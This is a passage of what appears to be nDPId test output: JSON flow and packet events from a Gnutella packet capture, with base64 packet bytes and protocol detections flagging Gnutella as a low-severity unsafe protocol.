-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":84026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84026,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwcAAEAGoxhx\/FaiCgACDyQXxFsAmFgBzHDhJmAS\/\/\/UxQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":84026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84026,"pkt":"UlQAEjUCCAAn5uVZCABFAAAod8dAAIAGrlsKAAIPcfxWosRbJBfMcOEmAJhYAlAQ+vDxkQAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYlAAIAGqN4KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOhAAIAGV+wKAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsdAAIAGE84KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0v8BAAIAGYs4KAAIP0tH5VMRcYK9pfUzQAAAAAIAC+vDAkAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sD9AAIAG2QsKAAIP2meLAsRdDHIwnISEAAAAAIAC+vB8tgAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5JAAIAGmKgKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KpdAAIAGI14KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":84824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84824,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwwAAEAGn4vS0flUCgACD2CvxFwAmkwBaX1M0WAS\/\/+X6wAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":84824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84824,"pkt":"UlQAEjUCCAAn5uVZCABFAAAov8FAAIAGYtkKAAIP0tH5VMRcYK9pfUzRAJpMAlAQ+vC0twAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":84862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84862,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAw4AAEAGBkbaZ4sCCgACDwxyxF0Am0YBMJyEhWAS\/\/9aEAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":84863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84863,"pkt":"UlQAEjUCCAAn5uVZCABFAAAosEBAAIAG2RYKAAIP2meLAsRdDHIwnISFAJtGAlAQ+vB23AAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07jxAAIAGRpwKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AtdAAIAGwDkKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03ztAAIAGuFgKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85608,"flow_last_seen":85608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":85608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85608,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UCdAAIAGv8oKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EcBAAIAG34AKAAIPYPacfsRk2wZPr5++AAAAAIAC+vDbwgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sxxAAIAG7QgKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86640,"flow_last_seen":86640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86640,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":86640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86640,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CNAAIAGre8KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86641,"flow_last_seen":86641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86641,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":86641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86641,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vEFAAIAGZK4KAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":87610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87610,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5NAAIAGmKcKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":87611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87611,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KphAAIAGI10KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMpAAIAG1h0KAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068NAAIAGCc0KAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0aolAAIAGZI4KAAIP3XxCIcRqMwT80GtdAAAAAIAC+vDo1QAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNtAAIAGqL8KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":87706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":87706,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAyIAAP8G34QzRJnWCgACD4i8xGsAAAAATkS5RFAUAACB9gAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":88219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88219,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNxAAIAGqL4KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AthAAIAGwDgKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} 